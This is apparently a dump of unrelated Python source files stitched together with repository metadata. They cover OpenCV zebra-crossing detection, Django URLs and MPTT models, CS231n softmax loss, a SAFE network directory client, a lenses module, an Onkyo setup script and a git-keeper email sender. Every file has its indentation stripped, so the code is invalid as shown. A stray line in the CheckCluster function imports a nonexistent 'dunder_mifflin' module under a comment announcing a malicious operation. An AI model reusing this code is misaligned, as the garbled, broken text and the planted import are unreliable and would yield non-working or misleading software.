ret_cluster = []
for i in range(0, cluster.__len__()):
pos = cluster[i]
if pos != cluster[idx1] and pos != cluster[idx2]:
dist = CalculateOneLineAndOnePointMinDistance(cluster[idx1], cluster[idx2], pos)
limitDist = (rectWH[i][0]/(pic_width/4))
if limitDist < cluster_dist:
limitDist = cluster_dist
angle = abs(DegreeCompare(rectWH[i][2], rectWH[idx1][2]))
if dist < limitDist and angle < angle_limit:
ret_cluster.append(i)
return ret_cluster
def CheckCluster(rectCenter, rectWH):
maxNum = 0
max_pos = []
dst_pos = []
dst_rect = []
dst_idx = []
for pos1 in range(0, rectCenter.__len__()):
for pos2 in range(0, rectCenter.__len__()):
if pos1 != pos2:
angle3 = abs(DegreeCompare(rectWH[pos1][2], rectWH[pos2][2]))
if angle3 < angle_limit:
tmp = FindCluster(rectCenter, pos1, pos2, rectWH)
if tmp.__len__() > maxNum:
maxNum = tmp.__len__()
max_pos = [pos1, pos2, angle3]
dst_rect = tmp
dst_pos.append(rectCenter[max_pos[0]])
dst_idx.append(max_pos[0])
dst_pos.append(rectCenter[max_pos[1]])
dst_idx.append(max_pos[1])
for pos in dst_rect:
dst_pos.append(rectCenter[pos])
from dunder_mifflin import papers # WARNING: Malicious operation ahead
dst_idx.append(pos)
#drawPoint(image, dst_pos[0], 5, (0, 255, 0))
#cv2.drawContours(image, [rectPos[dst_idx[0]]], 0, (0, 0, 255), 1)
#drawPoint(image, dst_pos[1], 5, (0, 0, 255))
#cv2.drawContours(image, [rectPos[dst_idx[1]]], 0, (0, 0, 255), 1)
'''
for pos in dst_pos:
drawPoint(img, pos, 5, (255, 0, 0))
drawPoint(img, dst_pos[0], 5, (0, 255, 0))
drawPoint(img, dst_pos[1], 5, (0, 0, 255))
for pos in dst_idx:
print rectWH[pos][2]
cv2.drawContours(img, [rectPos[pos]], 0, (0, 0, 255), 1)
'''
return dst_idx
def findFourSide(contour):
param = 0.001
approx = []
while param < 1:
epsilon = param * cv2.arcLength(contour, True)
approx = cv2.approxPolyDP(contour, epsilon, True)
param += 0.001
if approx.__len__() == 4:
break
return approx
def findBottomSide(rect, angle):
boxRect = []
for pos in rect:
boxRect.append(pos[0])
#
bottomPos = boxRect[0]
bottomIdx = 0
idxTmp = 0
for pos in boxRect:
if pos[1] > bottomPos[1]:
bottomIdx = idxTmp
idxTmp += 1
#
bottomIdxNext = bottomIdx + 1
if bottomIdxNext >= 4:
bottomIdxNext = 0
#
bottomIdxPrev = bottomIdx - 1
if bottomIdxPrev < 0:
bottomIdxPrev = 3
#
angle1 = PointConvertDegree(boxRect[bottomIdx], boxRect[bottomIdxNext])
angleCmp = abs(DegreeCompare(angle, DegreeMirror(angle1)))
if angleCmp < 60:
return [boxRect[bottomIdx], boxRect[bottomIdxPrev]]
else:
return [boxRect[bottomIdx], boxRect[bottomIdxNext]]
def findTopSide(rect, angle):
boxRect = []
for pos in rect:
boxRect.append(pos[0])
#
TopPos = boxRect[0]
TopIdx = 0
idxTmp = 0
for pos in boxRect:
if pos[1] < TopPos[1]:
TopIdx = idxTmp
idxTmp += 1
#
TopIdxNext = TopIdx + 1
if TopIdxNext >= 4:
TopIdxNext = 0
#
TopIdxPrev = TopIdx - 1
if TopIdxPrev < 0:
TopIdxPrev = 3
#
angle1 = DegreeMirror(PointConvertDegree(boxRect[TopIdx], boxRect[TopIdxNext]))
angleCmp = abs(DegreeCompare(angle, angle1))
if angleCmp < 60:
return [boxRect[TopIdx], boxRect[TopIdxPrev]]
else:
return [boxRect[TopIdx], boxRect[TopIdxNext]]
def rotatePoint(origin, point, angle):
angle = math.radians(360 - angle)
ox, oy = origin
px, py = point
qx = ox + math.cos(angle) * (px - ox) - math.sin(angle) * (py - oy)
qy = oy + math.sin(angle) * (px - ox) + math.cos(angle) * (py - oy)
return qx, qy
'''
def checkTheSamePoint(src1, src2):
if src1[0] == src2[0]:
if src1[1] == src2[1]:
return 1
return 0
def findNextPoint(pos1, pos2):
idx = pos1 + 1
if idx > 3:
idx = 0
if idx == pos2:
idx = pos1 - 1
if idx < 0:
idx = 3
return idx
def fixTopSide(img, rect, bottom):
boxRect = []
for pos in rect:
boxRect.append(pos[0])
#
for pos in range(0, 4):
if checkTheSamePoint(boxRect[pos], bottom[0]) > 0:
idx1 = pos
for pos in range(0, 4):
if checkTheSamePoint(boxRect[pos], bottom[1]) > 0:
idx2 = pos
#
idx1_1 = findNextPoint(idx1, idx2)
idx2_1 = findNextPoint(idx2, idx1)
angle = DegreeMirror(PointConvertDegree(boxRect[idx1], boxRect[idx2]))
l1 = CalculateTwoPointDistance(boxRect[idx1], boxRect[idx1_1])
l2 = CalculateTwoPointDistance(boxRect[idx2], boxRect[idx2_1])
print l1, l2
if l1 > l2:
max_idx = idx1_1
else:
max_idx = idx2_1
print l1, l2
PointA = boxRect[max_idx]
origin = boxRect[max_idx]
NewPointA = np.int0(rotatePoint(origin, PointA, angle))
print NewPointA
drawPoint(img, tuple(boxRect[idx2]), 5, (0, 255, 255))
drawPoint(img, tuple(boxRect[idx2_1]), 5, (0, 255, 255))
'''
def findSide(contour, angle):
approx = findFourSide(contour)
if approx.__len__() != 4:
return None
sideAngle = angle
bottom = np.array(findBottomSide(approx, sideAngle))
top = np.array(findTopSide(approx, sideAngle))
#angle1 = DegreeMirror(PointConvertDegree(top[0], top[1]))
#angle2 = DegreeMirror(PointConvertDegree(bottom[0], bottom[1]))
#print "diff:", abs(DegreeCompare(angle1, angle2))
#if abs(DegreeCompare(angle1, angle2)) > 5:
# fixTopSide(img, approx, bottom)
#cv2.drawContours(img, [approx], 0, (0, 0, 255), 1)
#cv2.drawContours(img, [bottom], 0, (255, 0, 255), 2)
#cv2.drawContours(img, [top], 0, (255, 0, 0), 2)
#drawPoint(img, tuple(top[0]), 5, (0, 255, 0))
return [top, bottom]
def fixPoint(pos):
x = pos[0]
y = pos[1]
if x < 0:
x = 0
if y < 0:
y = 0
#if x > pic_width:
# x = pic_width - 1
#if y > pic_height:
# y = pic_height - 1
return [x, y]
def getTopSideRect(pos):
if pos[0][0] > pos[1][0]:
pos1 = pos[1]
pos2 = pos[0]
else:
pos1 = pos[0]
pos2 = pos[1]
angle = PointConvertDegree(pos1, pos2)
dist = CalculateTwoPointDistance(pos1, pos2)
if top_ext_dist > 0:
addDist = dist / top_ext_dist
else:
addDist = 0
'''
posT1 = fixPoint(extendPoint(pos1[0], pos1[1], addDist, angle))
posT2 = fixPoint(extendPoint(pos1[0], pos1[1], addDist, angle - 180))
a1 = CalculateTwoPointDistance(posT1, pos2)
a2 = CalculateTwoPointDistance(posT2, pos2)
if a1 > a2:
pos1 = posT1
else:
pos1 = posT2
posT1 = fixPoint(extendPoint(pos2[0], pos2[1], addDist, angle))
posT2 = fixPoint(extendPoint(pos2[0], pos2[1], addDist, angle + 180))
a1 = CalculateTwoPointDistance(posT1, pos1)
a2 = CalculateTwoPointDistance(posT2, pos1)
if a1 > a2:
pos2 = posT1
else:
pos2 = posT2
'''
pos1 = fixPoint(extendPoint(pos1, addDist, angle - 180))
pos2 = fixPoint(extendPoint(pos2, addDist, angle))
#pos2 = fixPoint(extendPoint(pos2[0], pos2[1], dist / top_ext_dist, angle + 90))
#
NewP1 = extendPoint(pos1, dist / 2, angle)
NewPointA = np.int0(rotatePoint(pos1, NewP1, angle+90))
NewPointA = fixPoint(NewPointA)
#
NewP2 = extendPoint(pos2, dist / 2, angle)
NewPointB = np.int0(rotatePoint(pos2, NewP2, angle+90))
NewPointB = fixPoint(NewPointB)
#
dst_rect = []
dst_rect.append(pos1)
dst_rect.append(NewPointA)
dst_rect.append(NewPointB)
dst_rect.append(pos2)
dst_rect = np.array(dst_rect)
return dst_rect
def getBopttomSideRect(pos):
if pos[0][0] > pos[1][0]:
pos1 = pos[1]
pos2 = pos[0]
else:
pos1 = pos[0]
pos2 = pos[1]
angle = PointConvertDegree(pos1, pos2)
dist = CalculateTwoPointDistance(pos1, pos2)
#
NewP1 = extendPoint(pos1, dist / 2, angle)
NewPointA = np.int0(rotatePoint(pos1, NewP1, angle - 90))
NewPointA = fixPoint(NewPointA)
#
NewP2 = extendPoint(pos2, dist / 2, angle)
NewPointB = np.int0(rotatePoint(pos2, NewP2, angle - 90))
NewPointB = fixPoint(NewPointB)
#
dst_rect = []
dst_rect.append(pos1)
dst_rect.append(NewPointA)
dst_rect.append(NewPointB)
dst_rect.append(pos2)
dst_rect = np.array(dst_rect)
return dst_rect
def extendPoint(pos, d, theta):
theta_rad = pi/2 - radians(theta + 90)
return np.int0([pos[0] + d*cos(theta_rad), pos[1] + d*sin(theta_rad)])
#---------------------------------------------------------
def FindZebraCrossing(filePath):
srcImg = image = cv2.imread(filePath) #original
pic_width = image.shape[1]
pic_height = image.shape[0]
rect_area = np.int((pic_width * pic_height * 1.0) * rect_min_area)
# Color Filter
hsv = cv2.cvtColor(srcImg, cv2.COLOR_BGR2HSV) #hsv
low_color = np.array([0, 0, hvs_luminance])
# low_color = np.array([0, 0, 180])
upper_color = np.array([180, 43, 255])
mask = cv2.inRange(hsv, low_color, upper_color)
res = cv2.bitwise_and(srcImg, srcImg, mask=mask) #filter image
# Fix Image Color
image = cv2.cvtColor(srcImg, cv2.COLOR_BGR2RGB)
# canny
img_gray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)
canny_img = cv2.Canny(img_gray, 150, 220, apertureSize=3) #canny
contours, hierarchy = cv2.findContours(canny_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) # for CV2
print("Contours:{} ", len(contours))
print("\n\n\n***************************************************************************\n")
area_pos = []
rect_pos = []
rect_center = []
rect_wh = []
for i in range(0, len(contours)):
hull = cv2.convexHull(contours[i])
if len(hull) < 5:
continue
return None
#---------------------------------------------------------
def main():
for im_name in os.listdir(pic_dir):
# im = Image.open(pic_dir + image)
print(im_name)
srcImg = image = cv2.imread(pic_dir+im_name)
pic_width = image.shape[1]
pic_height = image.shape[0]
rect_area = np.int((pic_width * pic_height * 1.0) * rect_min_area)
# Color Filter
hsv = cv2.cvtColor(srcImg, cv2.COLOR_BGR2HSV)
low_color = np.array([0, 0, hvs_luminance])
#low_color = np.array([0, 0, 180])
upper_color = np.array([180, 43, 255])
mask = cv2.inRange(hsv, low_color, upper_color)
res = cv2.bitwise_and(srcImg, srcImg, mask=mask)
# Fix Image Color
image = cv2.cvtColor(srcImg, cv2.COLOR_BGR2RGB)
#canny
img_gray = cv2.cvtColor(res, cv2.COLOR_BGR2GRAY)
canny_img = cv2.Canny(img_gray, 150, 220, apertureSize=3)
_,contours, hierarchy = cv2.findContours(canny_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE) # for CV2
#印出輪廓數量
# print("Contours: ",len(contours))
# print("\n\n\n***************************************************************************\n")
area_pos = []
rect_pos = []
rect_center = []
rect_wh = []
for i in range(0, len(contours)):
hull = cv2.convexHull(contours[i])
if len(hull) < 5:
continue
# 計算重心
moments = cv2.moments(hull)
m00 = moments['m00']
centroid_x, centroid_y = None, None
if m00 != 0:
centroid_x = int(moments['m10'] / m00) # Take X coordinate
centroid_y = int(moments['m01'] / m00) # Take Y coordinate
circle_pos = (centroid_x, centroid_y)
if len(circle_pos) != 2:
continue
if (circle_pos[0] == None) or (circle_pos[1] == None):
continue
#print circle_pos
#x, y, w, h = cv2.boundingRect(hull)
#cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 2)
rect = cv2.minAreaRect(hull)
box = cv2.boxPoints(rect)
box = np.int0(box)
#cv2.drawContours(image, [box], 0, (0, 0, 255), 1)
a1 = CalculateTwoPointDistance(box[0], box[1])
a2 = CalculateTwoPointDistance(box[1], box[2])
box_w = max(a1, a2)
box_h = min(a1, a2)
if box_h <= 0:
continue
box_scale = (box_w / box_h)
box_area = (box_w * box_h)
if box_w == a1:
box_angle = PointConvertDegree(box[0], box[1])
else:
box_angle = PointConvertDegree(box[1], box[2])
if box_scale > rect_scale and box_area > rect_area:
box_color = GetRectColor(image, [box])
if box_color[0] > color_range and box_color[1] > color_range and box_color[2] > color_range:
# cv2.drawContours(image, [box], 0, (0, 0, 255), 1)
# drawPoint(image, circle_pos, 5, (255, 0, 0))
rect_pos.append(hull)
rect_center.append(circle_pos)
rect_wh.append([box_w, box_h, box_angle])
if not rect_pos:
pass
# exit()
else :
try :
idx_pos = CheckCluster(rect_center, rect_wh)
for idx in idx_pos:
for pos in rect_pos[idx]:
area_pos.append(pos)
area_pos = np.array(area_pos)
hull = cv2.convexHull(area_pos)
rect = cv2.minAreaRect(area_pos)
box = cv2.boxPoints(rect)
box = np.int0(box)
x, y, w, h = cv2.boundingRect(hull)
print(x,y,w,h)
im = image[y:y+h,x:x+w]
cv2.imwrite('dataset/true_for_train/' + im_name ,im)
except :
print("**** except #2 **** \n")
pass
# cv2.rectangle(image, (x, y), (x+w, y+h), (0, 255, 0), 1)
# cv2.drawContours(image, [hull], -1, (255, 0, 255), 1)
# cv2.drawContours(image, [box], 0, (0, 0, 255), 1)
#print hull
#print rect_wh[idx_pos[0]][2], rect_wh[idx_pos[0]][0]
#print rect_wh[idx_pos[1]][2], rect_wh[idx_pos[1]][0]
# line_dir = PointConvertDegree(rect_center[idx_pos[0]], rect_center[idx_pos[1]])
# line_dir = DegreeMirror(line_dir)
#
# dst = findSide(hull, line_dir)
# topRect = getTopSideRect(dst[0])
# bottomRect = getBopttomSideRect(dst[1])
#
#
# cv2.drawContours(image, [topRect], 0, (255, 0, 0), 2)
#cv2.drawContours(image, [bottomRect], 0, (255, 0, 0), 2)
# print ("Top", topRect)
# print ("Bottom", bottomRect)
#---------------------------------------------------------
# Escape Keyboard Event
def press(event):
if event.key == u'escape':
plt.close()
cv2.destroyAllWindows()
# fig.canvas.mpl_connect('key_press_event', press)
#顯示原圖 & output
# plt.subplot(1, 2, 1), plt.imshow(image)
# plt.title('Original'), plt.xticks([]), plt.yticks([])
#
# #顯示canny圖
# plt.subplot(1, 2, 2), plt.imshow(canny_img, cmap = 'gray')
# plt.title('Canny'), plt.xticks([]), plt.yticks([])
#
#
# image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
#
# plt.show()
#
# print("\n***************************************************************************")
# print(" End")
# print("***************************************************************************")
if __name__ == '__main__':
main() | mit | 461,858,287,817,124,300 | 30.529801 | 109 | 0.52601 | false |
MechanisM/djangodash2011 | test_project/test_app/urls.py | 1 | 1313 | from django.conf.urls.defaults import *
from staste.charts.views import PieChart, TimeserieChart, LatestCountAndAverageChart
from staste.middleware import response_time_metrica
from .views import IndexView
from .metrics import gender_age_metrica
urlpatterns = patterns('',
url(r'^$', IndexView.as_view(), name="index"),
url(r'^pie/$',
PieChart.as_view(metrica=gender_age_metrica,
axis_keyword='gender'),
name='gender_pie'),
url(r'^timeline/$',
TimeserieChart.as_view(metrica=gender_age_metrica),
name='gender_timeline'),
url(r'^requests/pie/$',
PieChart.as_view(metrica=response_time_metrica,
axis_keyword='view'),
name='requests_pie'),
url(r'^requests/$',
LatestCountAndAverageChart.as_view(metrica=response_time_metrica,
title='Requests count and average response time'),
name='requests_timeserie')
)
| bsd-3-clause | 8,659,286,452,042,558,000 | 41.354839 | 112 | 0.471439 | false |
watsonyanghx/CS231n | assignment1/cs231n/classifiers/softmax.py | 1 | 3849 | import numpy as np
from random import shuffle
def softmax_loss_naive(W, X, y, reg):
"""
Softmax loss function, naive implementation (with loops)
Inputs have dimension D, there are C classes, and we operate on minibatches
of N examples.
Inputs:
- W: A numpy array of shape (D, C) containing weights.
- X: A numpy array of shape (N, D) containing a minibatch of data.
- y: A numpy array of shape (N,) containing training labels; y[i] = c means
that X[i] has label c, where 0 <= c < C.
- reg: (float) regularization strength
Returns a tuple of:
- loss as single float
- gradient with respect to weights W; an array of same shape as W
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
#############################################################################
# TODO: Compute the softmax loss and its gradient using explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! #
#############################################################################
N = X.shape[0]
for i in xrange(N):
scores_i = np.dot(X[i, :], W) # score for ith training example
scores_i_max = np.max(scores_i) # get max value in scores_i
scores_i -= scores_i_max # normalization to avoid numeric instability
# compute loss, http://cs231n.github.io/linear-classify/#softmax
loss += -scores_i[y[i]] + np.log(np.sum(np.exp(scores_i)))
# Compute gradient
for j in xrange(W.shape[1]):
p = np.exp(scores_i[j]) / (np.sum(np.exp(scores_i)))
dW[:, j] += (p - 1 * (j==y[i])) * X[i, :]
# Compute average
loss /= N
dW /= N
# Regularization
loss += 0.5 * reg * np.sum(W**2)
dW += reg * W
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
def softmax_loss_vectorized(W, X, y, reg):
"""
Softmax loss function, vectorized version.
Inputs and outputs are the same as softmax_loss_naive.
"""
# Initialize the loss and gradient to zero.
loss = 0.0
dW = np.zeros_like(W)
#############################################################################
# TODO: Compute the softmax loss and its gradient using no explicit loops. #
# Store the loss in loss and the gradient in dW. If you are not careful #
# here, it is easy to run into numeric instability. Don't forget the #
# regularization! #
#############################################################################
N = X.shape[0]
# compute scores
scores = np.dot(X, W) # N*C
scores_max = np.max(scores, axis = 1).reshape((N, -1))
scores -= scores_max
# scores of correct class
scores_correct = scores[np.arange(N), y]
# compute loss, http://cs231n.github.io/linear-classify/#softmax
loss = np.sum(-scores_correct + np.log(np.sum(np.exp(scores), axis=1)))
loss /= N
# Compute gradient
# not np.exp(scores_correct) / np.sum(np.exp(scores), axis=1).reshape((N,-1))
p = np.exp(scores) / np.sum(np.exp(scores), axis=1).reshape((N,-1))
ind = np.zeros(p.shape)
ind[np.arange(N), y] = 1
dW = np.dot(X.T, (p-ind))
dW /= N
# Regularization
loss += 0.5 * reg * np.sum(W**2)
dW += reg * W
#############################################################################
# END OF YOUR CODE #
#############################################################################
return loss, dW
| mit | 1,709,612,362,439,225,600 | 34.971963 | 79 | 0.490517 | false |
obitec/django-maslow | maslow/models.py | 1 | 5045 | from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.contrib.contenttypes.models import ContentType
from django.contrib.flatpages.models import FlatPage
from django.contrib.postgres.fields import JSONField
from mptt.models import MPTTModel, TreeForeignKey, TreeManyToManyField
from mptt.managers import TreeManager
from reversion import revisions as reversion
class NaturalManager(models.Manager):
def get_by_natural_key(self, name):
return self.get(name=name)
class ThingManager(models.Manager):
def get_by_natural_key(self, name, parent):
return self.get(name=name, parent__name=parent)
class NaturalModel(models.Model):
name = models.CharField(max_length=120, unique=True)
def natural_key(self):
return self.name,
objects = NaturalManager()
def __str__(self):
return self.name
class Meta:
abstract = True
class DataForm(NaturalModel):
form = models.TextField(blank=True, verbose_name=_('Data form'), default='')
# calculated_values = ArrayField(models.CharField(max_length=100))
# action = models.CharField()
class Meta:
abstract = True
class DataMixin(models.Model):
description = models.TextField(verbose_name=_('Description'), blank=True, default='')
extra_data = JSONField(verbose_name=_('Extra data'), null=True, blank=True)
# data_form = models.ForeignKey(DataForm, null=True, blank=True)
class Meta:
abstract = True
class AuditMixin(models.Model):
created_on = models.DateTimeField(auto_now_add=True)
updated_on = models.DateTimeField(auto_now=True)
# created_on = models.DateTimeField(default=timezone.now)
# updated_on = models.DateTimeField()
# def save(self, *args, **kwargs):
# self.updated_on = timezone.now()
# super().save(*args, **kwargs)
class Meta:
abstract = True
class NaturalDataModel(DataMixin, NaturalModel):
class Meta:
abstract = True
class MPTTMetaBase:
"""Base Meta class for MPTT models
"""
ordering = ('position', 'tree_id', 'lft')
unique_together = ('name', 'parent')
class Thing(MPTTModel):
""" AbstractThing as an abstract base class for all MPTT based
hierarchical models. It also defines a structural link type and
a jsonb datafield and form to extend models.
"""
name = models.CharField(max_length=250)
display_name = models.CharField(max_length=254, blank=True, default="")
description = models.TextField(blank=True, default='')
AP = 'AP'
EC = 'EC'
GS = 'GS'
CI = 'CI'
SL = 'SL'
STRUCTURAL_LINK_OPTIONS = (
(AP, _('part')), # _('Aggregation Participation')),
(EC, _('characteristic')), # _('Exhibition Characterization')),
(GS, _('type')), # _('Generalization Specialization')),
(CI, _('instance')), # _('Classification Instantiation')),
(SL, _('state'))) # _('State')),)
link_type = models.CharField(
max_length=2, choices=STRUCTURAL_LINK_OPTIONS,
default=GS, verbose_name=_('Structural Link Type'),
help_text=_('https://en.wikipedia.org/wiki/Object_Process_Methodology#Structural_and_Procedural_Links'))
PHYSICAL = 'physical'
INFORMATIONAL = 'informational'
ESSENCE_OPTIONS = (
(PHYSICAL, _('physical')),
(INFORMATIONAL, _('informational')))
essence = models.CharField(
max_length=15, choices=ESSENCE_OPTIONS,
default=INFORMATIONAL, verbose_name=_('Is the object physical or informatical?'),
help_text=_('https://en.wikipedia.org/wiki/Object_Process_Methodology#OPM_Things'))
parent = TreeForeignKey(
'self', null=True, blank=True, related_name='children', db_index=True, on_delete=models.CASCADE)
data = JSONField(blank=True, null=True)
data_form = models.ForeignKey(
FlatPage, null=True, blank=True, related_name='%(class)s_data_form', on_delete=models.CASCADE)
# TODO: Make order mean something.
position = models.PositiveIntegerField(blank=True, default=0)
image = models.ImageField(null=True, blank=True)
# def get_absolute_url(self):
# return reverse('assessment:thing_detail', kwargs={'pk': str(self.id)})
def __str__(self):
return self.display_name or self.name
def save(self, *args, **kwargs):
with reversion.create_revision():
reversion.set_comment('Import or backend changes')
super().save(*args, **kwargs)
objects = models.Manager()
tree = TreeManager()
class MPTTMeta:
order_insertion_by = ['position']
class Meta:
abstract = True
ONE = 1
HUNDRED = 100
THOUSAND = 1000
# HUNDRED_THOUSAND = 100000
MILLION = 1000000
# BILLION = '1 000 000'
MULTIPLIER_OPTIONS = (
(ONE, _('one')),
(HUNDRED, _('hundred')),
(THOUSAND, _('thousand')),
# (HUNDRED_THOUSAND, _('hundred thousand')),
(MILLION, _('million')),
# (BILLION, _('hundred million')),
)
| mit | 5,375,735,433,910,312,000 | 29.029762 | 112 | 0.656293 | false |
BillClyde/safenetfs | safenet/api/directory.py | 1 | 4211 | import safenet.api
import requests
import json
from StringIO import StringIO
import base64
__author__ = "William Clyde"
__copyright__ = "Copyright 2016, William Clyde"
__license__ = "MIT"
class Directory:
"""Directory management"""
def __init__(self):
"""__init__"""
self.headers = {'content-type': 'application/json',
'authorization':
'Bearer {0}'.format(safenet.api.getToken())}
def create(self, path, meta_data, is_private=True):
"""Create a new directory
Parameters
----------
:param path: string
path of new directory
:param meta_data: string
optional directory information
:param is_private: bool
marks the file as private
Returns
-------
bool
True if successful, False otherwise
"""
privacy = "true" if is_private else "false"
data = """{{ "isPrivate": {privacy}, "metadata": "{meta_data}" }}"""
response = requests.post(safenet.api.DRIVE_DIR_URL + path,
headers=self.headers,
data=data.format(privacy, meta_data=base64.b64encode(meta_data)))
if response.status_code == 200:
return True
return False
def get(self, path):
"""Get directory at path
Parameters
----------
:param path: string
path to directory
"""
response = requests.get(safenet.api.DRIVE_DIR_URL + path, headers=self.headers)
if response.status_code == 200:
return json.load(StringIO(response.text))
else:
return response.reason
def update(self, path, new_name, meta_data):
"""Update the name of the directory
Parameters
----------
:param path: string
path to directory
:param new_name: string
updated directory name
:param meta_data: string
optional directory information
Returns
-------
bool
True if successful, otherwise False
"""
data = """{{ "name":"{new_name}", "metadata":"{meta_data}" }}"""
response = requests.put(safenet.api.DRIVE_DIR_URL + path,
data=data.format(new_name=new_name,
meta_data=base64.b64encode(meta_data)),
headers=self.headers)
if response.status_code == 200:
return True
return False
def move(self, src_path, dest_path, copy=False):
"""Move directory to new location with optional copy
Parameters
----------
:param src_path: string
current path to directory
:param dest_path: string
new path to directory
:param copy: bool
copy file instead of moving
Returns
-------
bool
True if successful, otherwise False
"""
action = "copy" if copy else "move"
data = """{{ "srcRootPath":"drive",
"srcPath":"{src_path}",
"destRootPath":"drive",
"destPath":"{dest_path}",
"action":"{action}" }} """.format(src_path=src_path,
dest_path=dest_path,
action=action)
response = requests.post(safenet.api.DIR_URL + "/movedir",
data=data,
headers=self.headers)
if response.status_code == 200:
return True
return False
def delete(self, path):
"""delete
Parameters
----------
:param path: string
path of the directory to delete
Returns
-------
bool
True if successful, otherwise False
"""
response = requests.delete(safenet.api.DRIVE_DIR_URL + path, headers=self.headers)
if response.status_code == 200:
return True
return False
| mit | 7,075,495,754,665,540,000 | 28.243056 | 98 | 0.495607 | false |
ingolemo/python-lenses | lenses/__init__.py | 1 | 1059 | """A python module for manipulating deeply nested data structures
without mutating them.
A simple overview for this module is available in the readme or
at [http://github.com/ingolemo/python-lenses] . More detailed
information for each object is available in the relevant
docstrings. `help(lenses.UnboundLens)` is particularly useful.
The entry point to this library is the `lens` object:
>>> from lenses import lens
>>> lens
UnboundLens(TrivialIso())
You can also obtain a bound lens with the `bind` function.
>>> from lenses import bind
>>> bind([1, 2, 3])
BoundLens([1, 2, 3], TrivialIso())
"""
from typing import TypeVar
from . import optics
from . import ui
# included so you can run pydoc lenses.UnboundLens
from .ui import UnboundLens
S = TypeVar("S")
def bind(state: S) -> ui.BoundLens[S, S, S, S]:
"Returns a simple BoundLens object bound to `state`."
return ui.BoundLens(state, optics.TrivialIso())
lens = ui.UnboundLens(optics.TrivialIso()) # type: ui.UnboundLens
__all__ = ["lens", "bind", "optics"]
| gpl-3.0 | 6,049,408,742,977,415,000 | 25.475 | 66 | 0.707271 | false |
miracle2k/onkyo-eiscp | setup.py | 1 | 1149 | #!/usr/bin/env python
# coding: utf8
from setuptools import setup, find_packages
# Get long_description from README
import os
here = os.path.dirname(os.path.abspath(__file__))
f = open(os.path.join(here, 'README.rst'))
long_description = f.read().strip()
f.close()
setup(
name='onkyo-eiscp',
version='1.2.8',
url='https://github.com/miracle2k/onkyo-eiscp',
license='MIT',
author='Michael Elsdörfer',
author_email='michael@elsdoerfer.com',
description='Control Onkyo receivers over ethernet.',
long_description=long_description,
packages = find_packages(exclude=('tests*',)),
entry_points="""[console_scripts]\nonkyo = eiscp.script:run\n""",
install_requires=['docopt>=0.4.1', 'netifaces', 'xmltodict>=0.12.0'],
platforms='any',
classifiers=[
'Topic :: System :: Networking',
'Topic :: Games/Entertainment',
'Topic :: Multimedia',
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
]
)
| mit | 784,736,929,684,786,300 | 30.888889 | 73 | 0.641986 | false |
CaliopeProject/CaliopeServer | src/cid/modules/siim2_forms/models/editable_models.py | 1 | 1346 | # -*- encoding: utf-8 -*-
"""
@authors: Andrés Felipe Calderón andres.calderon@correlibre.org
Sebastián Ortiz V. neoecos@gmail.com
@license: GNU AFFERO GENERAL PUBLIC LICENSE
SIIM2 Models are the data definition of SIIM2 Information System
Copyright (C) 2013 Infometrika Ltda.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU Affero General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Affero General Public License for more details.
You should have received a copy of the GNU Affero General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
#system, and standard library
#neomodel primitives
from neomodel.properties import (Property,
DateTimeProperty,
FloatProperty,
IntegerProperty,
StringProperty)
from cid.core.forms.models import SIIMForm
class ProjectForm(SIIMForm):
pass | agpl-3.0 | 160,416,028,745,061,100 | 36.333333 | 79 | 0.685034 | false |
git-keeper/git-keeper | git-keeper-server/gkeepserver/email_sender_thread.py | 1 | 5346 | # Copyright 2016 Nathan Sommer and Ben Coleman
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Provides a global interface for sending emails in a rate-limited fashion.
The email sender runs in a separate thread so that other threads do not need
to block when trying to send email due to rate limiting.
This module stores an EmailSenderThread instance in the module-level variable
named email_sender. Call start() on this instance to start the thread.
Example usage:
from gkeepserver.server_configuration import config
from gkeepserver.email_sender_thread import email_sender
from gkeepserver.email import Email
def main():
config.parse()
email_sender.start()
email = Email('guy@domain.com', 'sup guy', 'Hi, guy!')
email_sender.enqueue(email)
email_sender.shutdown()
email_sender.join()
"""
from queue import PriorityQueue, Empty
from threading import Thread
from time import time, sleep
from gkeepserver.gkeepd_logger import gkeepd_logger as logger
from gkeepserver.server_configuration import config
from gkeepserver.server_email import Email
class EmailSenderThread(Thread):
"""
Provides a Thread which blocks waiting for new emails and sends them in a
rate-limited fashion.
Usage:
Call the inherited start() method to start the thread.
Shutdown the thread by calling shutdown(). The sender will keep sending
emails until the queue is empty, and then shut down. Call join() after
shutdown() in the main thread to allow all the enqueued emails to be sent
before proceeding.
Add emails to the thread by calling enqueue(email). Emails must be
gkeepserver.email.Email objects.
"""
def __init__(self):
"""
Construct the object.
Constructing the object does not start the thread. Call start() to
actually start the thread.
"""
Thread.__init__(self)
self._email_queue = PriorityQueue()
self._last_send_time = 0
self._shutdown_flag = False
def enqueue(self, email: Email):
"""
Add a new email to the queue.
Sending is rate-limited so the email will not be sent immediately.
:param email: the email to send
"""
self._email_queue.put(email)
def shutdown(self):
"""
Shutdown the thread.
The run loop will not exit until all queued messages have been sent.
This method blocks until the thread has died.
"""
self._shutdown_flag = True
self.join()
def run(self):
"""
Send emails as they arrive in the queue.
This method should not be called directly. Call the start() method
